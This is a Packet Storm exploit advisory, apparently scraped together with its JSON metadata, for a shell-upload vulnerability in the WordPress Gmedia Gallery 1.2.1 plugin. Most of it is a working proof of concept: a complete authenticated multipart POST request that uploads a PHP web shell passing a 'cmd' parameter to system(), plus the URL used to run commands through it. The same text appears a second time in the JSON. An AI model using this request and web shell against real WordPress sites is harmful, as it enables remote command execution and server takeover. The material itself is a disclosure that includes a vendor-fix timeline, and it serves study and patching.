ID PACKETSTORM:127725
Type packetstorm
Reporter Claudio Viviani
Modified 2014-08-03T00:00:00
Description
`######################
# Exploit Title : WordPress Gmedia Gallery 1.2.1 Shell Upload Vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.codeasily.com/
# Software Link : http://downloads.wordpress.org/plugin/grand-media.zip
# Date : 2014-08-01
# Tested on : Windows 7 / Mozilla Firefox
######################
# Description :
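Any user with upload rights in the plugin (administrator by default) can upload PHP files. The request below is sent from a logged-in wp-admin session (see the Referer and Cookie headers), and the uploaded file is stored under wp-content/grand-media/application/, where it can be requested directly and is executed as PHP. Sites running this version should apply the vendor fix noted in the timeline and check that directory for unexpected .php files.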
######################
# Vulnerability Disclosure Timeline:
2014-08-01: Discovered vulnerability
2014-08-01: Vendor Notification (Twitter)
2014-08-01: Vendor Response/Feedback
2014-08-02: Vendor Fix/Patch
2014-08-02: Public Disclosure
######################
# PoC:
POST
Host=127.0.0.1
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding=gzip, deflate
Referer=http://127.0.0.1/wordpress/wp-admin/admin.php?page=GrandMedia_AddMedia
Content-Length=916
Content-Type=multipart/form-data; boundary=---------------------------304431219031197
Cookie=wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7Ce7319f78d3d8ab969d8896d72dc8c2da; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7C7d38cc7811b5a07ab22e799069eed6e7; wp-settings-time-1=1406915840
Connection=keep-alive
Pragma=no-cache
Cache-Control=no-cache
POSTDATA =-----------------------------304431219031197
Content-Disposition: form-data; name="name"
.shell.php
-----------------------------304431219031197
Content-Disposition: form-data; name="chunk"
0
-----------------------------304431219031197
Content-Disposition: form-data; name="chunks"
1
-----------------------------304431219031197
Content-Disposition: form-data; name="params"
terms%5Bgmedia_category%5D=&terms%5Bgmedia_album%5D=&terms%5Bgmedia_tag%5D=
-----------------------------304431219031197
Content-Disposition: form-data; name="file"; filename=".shell.php"
Content-Type: application/octet-stream
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
-----------------------------304431219031197--
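Backdoor location (the uploaded file is reachable in the plugin's web-accessible upload directory and runs as PHP when requested):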
http://127.0.0.1/wordpress/wp-content/grand-media/application/.shell.php?cmd=pwd
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
#####################
`
{"id": "PACKETSTORM:127725", "type": "packetstorm", "bulletinFamily": "exploit", "title": "WordPress Gmedia Gallery 1.2.1 Shell Upload", "description": "", "published": "2014-08-03T00:00:00", "modified": "2014-08-03T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/127725/WordPress-Gmedia-Gallery-1.2.1-Shell-Upload.html", "reporter": "Claudio Viviani", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:20:16", "viewCount": 27, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2016-11-03T10:20:16", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:20:16", "rev": 2}, "vulnersScore": 0.1}, "sourceHref": "https://packetstormsecurity.com/files/download/127725/wpgmediagallery-shell.txt", "sourceData": "`\ufeff###################### \n# Exploit Title : Wordpress Gmedia Gallery 1.2.1 Shell Upload Vulnerability \n \n# Exploit Author : Claudio Viviani \n \n# Vendor Homepage : http://www.codeasily.com/ \n \n# Software Link : http://downloads.wordpress.org/plugin/grand-media.zip \n \n# Date : 2014-08-01 \n \n# Tested on : Windows 7 / Mozilla Firefox \n \n###################### \n \n# Description : \n \nAny user could upload php files (administrator by default). 
\n \n###################### \n \n# Vulnerability Disclosure Timeline: \n \n2014-08-01: Discovered vulnerability \n2014-08-01: Vendor Notification (Twitter) \n2014-08-01: Vendor Response/Feedback \n2014-08-02: Vendor Fix/Patch \n2014-08-02: Public Disclosure \n \n###################### \n \n# PoC: \n \nPOST \nHost=127.0.0.1 \nUser-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 \nAccept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 \nAccept-Encoding=gzip, deflate \nReferer=http://127.0.0.1/wordpress/wp-admin/admin.php?page=GrandMedia_AddMedia \nContent-Length=916 \nContent-Type=multipart/form-data; boundary=---------------------------304431219031197 \nCookie=wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7Ce7319f78d3d8ab969d8896d72dc8c2da; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7C7d38cc7811b5a07ab22e799069eed6e7; wp-settings-time-1=1406915840 \nConnection=keep-alive \nPragma=no-cache \nCache-Control=no-cache \nPOSTDATA =-----------------------------304431219031197 \nContent-Disposition: form-data; name=\"name\" \n \n.shell.php \n-----------------------------304431219031197 \nContent-Disposition: form-data; name=\"chunk\" \n \n0 \n-----------------------------304431219031197 \nContent-Disposition: form-data; name=\"chunks\" \n \n1 \n-----------------------------304431219031197 \nContent-Disposition: form-data; name=\"params\" \n \nterms%5Bgmedia_category%5D=&terms%5Bgmedia_album%5D=&terms%5Bgmedia_tag%5D= \n-----------------------------304431219031197 \nContent-Disposition: form-data; name=\"file\"; filename=\".shell.php\" \nContent-Type: application/octet-stream \n \n<?php \n \nif(isset($_REQUEST['cmd'])){ \necho \"<pre>\"; \n$cmd = ($_REQUEST['cmd']); \nsystem($cmd); \necho \"</pre>\"; \ndie; \n} \n \n?> \n \n \n \n-----------------------------304431219031197-- \n \n \nBackdoor 
location: \n \nhttp://127.0.0.1/wordpress/wp-content/grand-media/application/.shell.php?cmd=pwd \n \n \n##################### \n \nDiscovered By : Claudio Viviani \nhttp://www.homelab.it \ninfo@homelab.it \nhomelabit@protonmail.ch \n \nhttps://www.facebook.com/homelabit \nhttps://twitter.com/homelabit \nhttps://plus.google.com/+HomelabIt1/ \n \n##################### \n`\n", "immutableFields": []}
{}